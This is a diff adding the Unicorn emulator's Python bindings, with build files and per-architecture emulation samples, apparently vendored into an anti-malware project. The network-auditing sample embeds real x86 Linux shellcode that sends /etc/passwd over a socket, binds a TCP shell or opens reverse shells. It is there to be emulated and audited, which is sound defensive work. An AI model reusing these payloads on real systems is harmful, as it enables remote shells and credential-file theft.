1332; + UC_X86_INS_XSHA256 = 1333; + UC_X86_INS_XSTORE = 1334; + UC_X86_INS_XTEST = 1335; + UC_X86_INS_FDISI8087_NOP = 1336; + UC_X86_INS_FENI8087_NOP = 1337; + UC_X86_INS_ENDING = 1338; + +implementation +end. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/MANIFEST.in b/ai_anti_malware/unicorn/unicorn-master/bindings/python/MANIFEST.in new file mode 100644 index 0000000..a98ea52 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/MANIFEST.in @@ -0,0 +1,4 @@ +recursive-include src * +recursive-include prebuilt * +include LICENSE.TXT +include README.TXT diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/python/Makefile new file mode 100644 index 0000000..ea831fd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/Makefile @@ -0,0 +1,84 @@ +# Python binding for Unicorn engine. Nguyen Anh Quynh <aquynh@gmail.com> + +.PHONY: gen_const install install3 clean sdist sdist3 bdist bdist3 sdist_win bdist_win + +gen_const: + cd .. 
&& python const_generator.py python + +install: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + if test -n "${DESTDIR}"; then \ + python setup.py install --root="${DESTDIR}"; \ + else \ + python setup.py install; \ + fi + +install3: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + if test -n "${DESTDIR}"; then \ + python3 setup.py install --root="${DESTDIR}"; \ + else \ + python3 setup.py install; \ + fi + +# build & upload PyPi package with source code of the core +sdist: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + python setup.py sdist register upload + +# build & upload PyPi package with source code of the core +sdist3: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + python3 setup.py sdist register upload + +# build & upload PyPi package with precompiled core +bdist: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + python setup.py bdist_wheel register upload + +# build & upload PyPi package with precompiled core +bdist3: + rm -rf src/ dist/ + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + python3 setup.py bdist_wheel register upload + +# build & upload PyPi package with prebuilt core +# NOTE: be sure to have precompiled core under prebuilt/win*/ beforehand +sdist_win: + rm -rf src/ dist/ + python setup.py sdist register upload + +# build & upload PyPi package with prebuilt core +# NOTE: be sure to have precompiled core under prebuilt/win*/ beforehand +sdist3_win: + rm -rf src/ dist/ + python3 setup.py sdist register upload + +clean: + rm -rf src/ dist/ build/ MANIFEST + rm -rf prebuilt/win64/unicorn.dll + rm -rf prebuilt/win32/unicorn.dll + rm -rf unicorn/lib unicorn/include + rm -rf unicorn/*.pyc + rm -rf unicorn.egg-info + + +SAMPLES = sample_arm.py sample_arm64.py sample_mips.py +SAMPLES += sample_sparc.py 
sample_m68k.py sample_x86.py +check: + @for t in $(SAMPLES); do \ + echo Check $$t ... ; \ + ./$$t > /dev/null && echo OK || echo FAILED; \ + done + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/README.TXT b/ai_anti_malware/unicorn/unicorn-master/bindings/python/README.TXT new file mode 100644 index 0000000..ab5747a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/README.TXT @@ -0,0 +1,41 @@ +This documentation explains how to install the python binding for Unicorn +from source. + +1. Installing on Linux: + + $ sudo python setup.py install + + This will build the core C library, package it with the python bindings, + and install it to your system. + + If you want to prevent the build of the native library during the python installation, + set the environment variable LIBUNICORN_PATH. You may also set this to a directory + containing libunicorn.so if you wish to use a verison of the native library other than + the globally installed one. + + +2. Installing on Windows: + + Run the following command in command prompt: + + C:\> C:\location_to_python\python.exe setup.py install + + Next, copy all the DLL files from the 'Core engine for Windows' package available + on the Unicorn download page and paste it in the path: + + C:\location_to_python\Lib\site-packages\unicorn\ + + +3. Sample code + + This directory contains some sample code to show how to use Unicorn API. + + - sample_<arch>.py + These code show how to access architecture-specific information for each + architecture. + + - shellcode.py + This shows how to analyze a Linux shellcode. + + - sample_network_auditing.py + This shows how to analyze & interpret Linux shellcode. 
diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/build_wheel.sh b/ai_anti_malware/unicorn/unicorn-master/bindings/python/build_wheel.sh new file mode 100644 index 0000000..e3c9d44 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/build_wheel.sh @@ -0,0 +1,14 @@ +#!/bin/bash +set -e -x + +cd bindings/python + +# Compile wheels +if [ -f /opt/python/cp36-cp36m/bin/python ];then + /opt/python/cp36-cp36m/bin/python setup.py bdist_wheel +else + python3 setup.py bdist_wheel +fi +cd dist +auditwheel repair *.whl +mv -f wheelhouse/*.whl . diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/prebuilt/.gitkeep b/ai_anti_malware/unicorn/unicorn-master/bindings/python/prebuilt/.gitkeep new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_all.sh b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_all.sh new file mode 100644 index 0000000..f4e7a55 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_all.sh @@ -0,0 +1,15 @@ +#!/bin/sh + +./sample_x86.py +echo "==========================" +./shellcode.py +echo "==========================" +./sample_arm.py +echo "==========================" +./sample_arm64.py +echo "==========================" +./sample_mips.py +echo "==========================" +./sample_sparc.py +echo "==========================" +./sample_m68k.py diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm.py new file mode 100644 index 0000000..5fae6b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python +# Sample code for ARM of Unicorn. 
Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * + + +# code to be emulated +ARM_CODE = b"\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 +THUMB_CODE = b"\x83\xb0" # sub sp, #0xc +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM +def test_arm(): + print("Emulate ARM code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_R0, 0x1234) + mu.reg_write(UC_ARM_REG_R2, 0x6789) + mu.reg_write(UC_ARM_REG_R3, 0x3333) + mu.reg_write(UC_ARM_REG_APSR, 0xFFFFFFFF) #All application flags turned on + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing one instruction at ADDRESS with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + r0 = mu.reg_read(UC_ARM_REG_R0) + r1 = mu.reg_read(UC_ARM_REG_R1) + print(">>> R0 = 0x%x" %r0) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +def test_thumb(): + print("Emulate THUMB code") + try: + # Initialize emulator in thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, THUMB_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + # Note we start at ADDRESS | 1 to indicate THUMB mode. + mu.emu_start(ADDRESS | 1, ADDRESS + len(THUMB_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + print(">>> SP = 0x%x" %sp) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm() + print("=" * 26) + test_thumb() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64.py new file mode 100644 index 0000000..0f9550b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python +# Sample code for ARM64 of Unicorn. 
Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.arm64_const import * + + +# code to be emulated +ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38" # str x11, [x13]; ldrb x15, [x13] + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM64 +def test_arm64(): + print("Emulate ARM64 code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM64_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM64_REG_X11, 0x12345678) + mu.reg_write(UC_ARM64_REG_X13, 0x10008) + mu.reg_write(UC_ARM64_REG_X15, 0x33) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing one instruction at ADDRESS with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + print(">>> As little endian, X15 should be 0x78:") + + x11 = mu.reg_read(UC_ARM64_REG_X11) + x13 = mu.reg_read(UC_ARM64_REG_X13) + x15 = mu.reg_read(UC_ARM64_REG_X15) + print(">>> X15 = 0x%x" %x15) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm64() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64eb.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64eb.py new file mode 100644 index 0000000..4d96f46 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_arm64eb.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python +# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> +# AARCH64 Python sample ported by zhangwm <rustydaar@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.arm64_const import * + + +# code to be emulated +ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38" # str x11, [x13]; ldrb x15, [x13] + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM64 +def test_arm64(): + print("Emulate ARM64 Big-Endian code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM | UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM64_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM64_REG_X11, 0x12345678) + mu.reg_write(UC_ARM64_REG_X13, 0x10008) + mu.reg_write(UC_ARM64_REG_X15, 0x33) + + # tracing all 
basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + print(">>> As big endian, X15 should be 0x12:") + + x11 = mu.reg_read(UC_ARM64_REG_X11) + x13 = mu.reg_read(UC_ARM64_REG_X13) + x15 = mu.reg_read(UC_ARM64_REG_X15) + print(">>> X15 = 0x%x" %x15) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm64() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_armeb.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_armeb.py new file mode 100644 index 0000000..9a2158d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_armeb.py @@ -0,0 +1,104 @@ +#!/usr/bin/env python +# Sample code for ARM big endian of Unicorn. 
zhangwm <rustydaar@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * + + +# code to be emulated +ARM_CODE = b"\xe3\xa0\x00\x37\xe0\x42\x10\x03" # mov r0, #0x37; sub r1, r2, r3 +THUMB_CODE = b"\xb0\x83" # sub sp, #0xc +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM +def test_arm(): + print("Emulate ARM Big-Endian code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_R0, 0x1234) + mu.reg_write(UC_ARM_REG_R2, 0x6789) + mu.reg_write(UC_ARM_REG_R3, 0x3333) + mu.reg_write(UC_ARM_REG_APSR, 0xFFFFFFFF) #All application flags turned on + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing one instruction at ADDRESS with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + r0 = mu.reg_read(UC_ARM_REG_R0) + r1 = mu.reg_read(UC_ARM_REG_R1) + print(">>> R0 = 0x%x" %r0) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +def test_thumb(): + print("Emulate THUMB code") + try: + # Initialize emulator in thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, THUMB_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + # Note we start at ADDRESS | 1 to indicate THUMB mode. + mu.emu_start(ADDRESS | 1, ADDRESS + len(THUMB_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + print(">>> SP = 0x%x" %sp) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm() + print("=" * 26) + test_thumb() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_m68k.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_m68k.py new file mode 100644 index 0000000..7e35cf5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_m68k.py @@ -0,0 +1,88 @@ +#!/usr/bin/env python +# Sample code for ARM of Unicorn. 
Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.m68k_const import * + + +# code to be emulated +M68K_CODE = b"\x76\xed" # movq #-19, %d3 +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test ARM +def test_m68k(): + print("Emulate M68K code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, M68K_CODE) + + # initialize machine registers + mu.reg_write(UC_M68K_REG_D3, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(M68K_CODE)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + a0 = mu.reg_read(UC_M68K_REG_A0) + a1 = mu.reg_read(UC_M68K_REG_A1) + a2 = mu.reg_read(UC_M68K_REG_A2) + a3 = mu.reg_read(UC_M68K_REG_A3) + a4 = mu.reg_read(UC_M68K_REG_A4) + a5 = mu.reg_read(UC_M68K_REG_A5) + a6 = mu.reg_read(UC_M68K_REG_A6) + a7 = mu.reg_read(UC_M68K_REG_A7) + d0 = mu.reg_read(UC_M68K_REG_D0) + d1 = mu.reg_read(UC_M68K_REG_D1) + d2 = mu.reg_read(UC_M68K_REG_D2) + d3 = mu.reg_read(UC_M68K_REG_D3) + d4 = mu.reg_read(UC_M68K_REG_D4) + d5 = mu.reg_read(UC_M68K_REG_D5) + d6 = mu.reg_read(UC_M68K_REG_D6) + d7 = mu.reg_read(UC_M68K_REG_D7) + pc = mu.reg_read(UC_M68K_REG_PC) + sr = mu.reg_read(UC_M68K_REG_SR) + print(">>> A0 = 0x%x\t\t>>> D0 = 0x%x" % (a0, d0)) + print(">>> A1 = 0x%x\t\t>>> D1 = 0x%x" % (a1, d1)) + print(">>> A2 = 0x%x\t\t>>> D2 = 0x%x" % (a2, d2)) + print(">>> A3 = 0x%x\t\t>>> D3 = 0x%x" % (a3, d3)) + print(">>> A4 = 0x%x\t\t>>> D4 = 0x%x" % (a4, d4)) + print(">>> A5 = 0x%x\t\t>>> D5 = 0x%x" % (a5, d5)) + print(">>> A6 = 0x%x\t\t>>> D6 = 0x%x" % (a6, d6)) + print(">>> A7 = 0x%x\t\t>>> D7 = 0x%x" % (a7, d7)) + print(">>> PC = 0x%x" % pc) + print(">>> SR = 0x%x" % sr) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_m68k() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_mips.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_mips.py new file mode 100644 index 0000000..7199b63 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_mips.py @@ -0,0 +1,101 @@ +#!/usr/bin/env python +# Sample code for MIPS of Unicorn. 
Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.mips_const import * + + +# code to be emulated +MIPS_CODE_EB = b"\x34\x21\x34\x56" # ori $at, $at, 0x3456; +MIPS_CODE_EL = b"\x56\x34\x21\x34" # ori $at, $at, 0x3456; + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test MIPS EB +def test_mips_eb(): + print("Emulate MIPS code (big-endian)") + try: + # Initialize emulator in MIPS32 + EB mode + mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, MIPS_CODE_EB) + + # initialize machine registers + mu.reg_write(UC_MIPS_REG_1, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EB)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + r1 = mu.reg_read(UC_MIPS_REG_1) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +# Test MIPS EL +def test_mips_el(): + print("Emulate MIPS code (little-endian)") + try: + # Initialize emulator in MIPS32 + EL mode + mu = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, MIPS_CODE_EL) + + # initialize machine registers + mu.reg_write(UC_MIPS_REG_1, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(MIPS_CODE_EL)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r1 = mu.reg_read(UC_MIPS_REG_1) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_mips_eb() + print("=" * 27) + test_mips_el() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_network_auditing.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_network_auditing.py new file mode 100644 index 0000000..bfccf82 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_network_auditing.py @@ -0,0 +1,408 @@ +#!/usr/bin/env python +# Unicorn sample for auditing network connection and file handling in shellcode. 
+# Nguyen Tan Cong <shenlongbk@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * +import struct +import uuid + +SIZE_REG = 4 +SOCKETCALL_MAX_ARGS = 3 + +SOCKET_TYPES = { + 1: "SOCK_STREAM", + 2: "SOCK_DGRAM", + 3: "SOCK_RAW", + 4: "SOCK_RDM", + 5: "SOCK_SEQPACKET", + 10: "SOCK_PACKET" +} + +ADDR_FAMILY = { + 0: "AF_UNSPEC", + 1: "AF_UNIX", + 2: "AF_INET", + 3: "AF_AX25", + 4: "AF_IPX", + 5: "AF_APPLETALK", + 6: "AF_NETROM", + 7: "AF_BRIDGE", + 8: "AF_AAL5", + 9: "AF_X25", + 10: "AF_INET6", + 12: "AF_MAX" +} + +# http://shell-storm.org/shellcode/files/shellcode-861.php +X86_SEND_ETCPASSWD = b"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" + +# http://shell-storm.org/shellcode/files/shellcode-882.php +X86_BIND_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80" + +# http://shell-storm.org/shellcode/files/shellcode-883.php +X86_REVERSE_TCP = b"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" + +# http://shell-storm.org/shellcode/files/shellcode-849.php 
+X86_REVERSE_TCP_2 = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\xc0\xa8\x01\x0a\x66\x68\x7a\x69\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80" + +# memory address where emulation starts +ADDRESS = 0x1000000 + + +# supported classes +class IdGenerator: + def __init__(self): + self.__next_id = 3 # exclude sdtin, stdout, stderr + + def next(self): + next_id = self.__next_id + + self.__next_id += 1 + + return next_id + + +class LogChain: + def __init__(self): + self.__chains = {} + self.__linking_fds = {} + + def clean(self): + self.__chains = {} + self.__linking_fds = {} + + def create_chain(self, my_id): + if not my_id in self.__chains: + self.__chains[my_id] = [] + else: + print("LogChain: id %d existed" % my_id) + + def add_log(self, id, msg): + fd = self.get_original_fd(id) + + if fd is not None: + self.__chains[fd].append(msg) + else: + print("LogChain: id %d doesn't exist" % id) + + def link_fd(self, from_fd, to_fd): + if not to_fd in self.__linking_fds: + self.__linking_fds[to_fd] = [] + + self.__linking_fds[to_fd].append(from_fd) + + def get_original_fd(self, fd): + if fd in self.__chains: + return fd + + for orig_fd, links in self.__linking_fds.items(): + if fd in links: + return orig_fd + + return None + + def print_report(self): + print(""" +---------------- +| START REPORT | +---------------- +""") + + for my_id, logs in self.__chains.items(): + print("---- START FD(%d) ----" % my_id) + print("\n".join(logs)) + print("---- END FD(%d) ----" % my_id) + + print(""" +-------------- +| END REPORT | +-------------- +""") + + +# end supported classes + + +# utilities +def bin_to_ipv4(ip): + return "%d.%d.%d.%d" % ( + (ip & 0xff000000) >> 24, + (ip & 0xff0000) >> 16, + (ip & 0xff00) >> 8, + (ip & 0xff)) + + +def 
read_string(uc, addr): + ret = "" + + c = uc.mem_read(addr, 1)[0] + read_bytes = 1 + + while c != 0x0: + ret += chr(c) + c = uc.mem_read(addr + read_bytes, 1)[0] + read_bytes += 1 + + return ret + + +def parse_sock_address(sock_addr): + sin_family, = struct.unpack("<h", sock_addr[:2]) + + if sin_family == 2: # AF_INET + port, host = struct.unpack(">HI", sock_addr[2:8]) + return "%s:%d" % (bin_to_ipv4(host), port) + elif sin_family == 6: # AF_INET6 + return "" + + +def print_sockcall(msg): + print(">>> SOCKCALL %s" % msg) + + +# end utilities + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size)) + # read this instruction code from memory + tmp = uc.mem_read(address, size) + print(">>> Instruction code at [0x%x] =" % (address), end="") + for i in tmp: + print(" %x" % i, end="") + print("") + + +# callback for 